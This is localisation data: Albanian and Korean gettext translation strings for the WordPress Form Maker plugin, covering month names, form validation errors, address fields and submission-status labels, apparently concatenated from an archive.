#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Janar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Shkurt"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Mars"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Prill"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maj"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Qershor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Korrik"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Gusht"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Shtator"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Tetor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Nëntor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Dhjetor"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Gabim, Kodi i gabuar i Sigurimit."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Ip juaj është në listën e zezë. Ju lutem kontaktoni administratorin e "
"internetit"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Dosja e tejkalon madhësinë e lejuar të"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Na vjen keq, ju nuk jeni i lejuar të ngarkoni këtë lloj file."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Gabim, skedari nuk mund të zhvendoset."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Kjo fushë %s kërkon një hyrje të veçantë dhe kjo vlerë është dorëzuar tashmë."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Gabim, e-mail nuk u dërgua."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Asgjë nuk është dorëzuar."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Forma juaj u dërgua me sukses."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Gabim, e-mail nuk u dërgua."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Adresa juaj e emailit është verifikuar tashmë."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Emaili juaj është verifikuar me sukses."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Verifikimi juaj e emailit ka mbaroi koha."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Lidhja Verifikimi është i pavlefshëm."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "fushë është e nevojshme."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Kjo nuk është një adresë e vlefshme email."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Ju nuk mund të zgjidhni ish datat. Zgjidhni një datë duke filluar nga ai i "
"tanishmi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Vlera duhet të jetë në mes të "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Sasia"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Rezultati juaj duhet të jetë më pak se "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titulli"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "I parë"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "I fundit"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Mes"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Prefiks i rrethit"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Numri i telefonit"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollarë"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cent"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Nga"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Për të"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "shkoni "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Reset"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Zgjidh një Field "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Zgjidh një datë"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ko_KR.po000060400000057243152434416630012216 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:00+0400\n"
"PO-Revision-Date: 2015-05-22 17:00+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ko\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "번지:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "주소 입력란 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "시"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "주 /도 / 지역"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "우편 / 우편 번호"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "국가"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "1월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "2월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "3월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "4월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "5월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "6월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "7월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "8월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "9월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "10월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "11월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "12월"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "오류, 잘못된 보안 코드입니다."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "당신의 IP가 블랙리스트됩니다. 웹 사이트 관리자에게 문의하십시오."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "파일의 허용 크기를 초과"

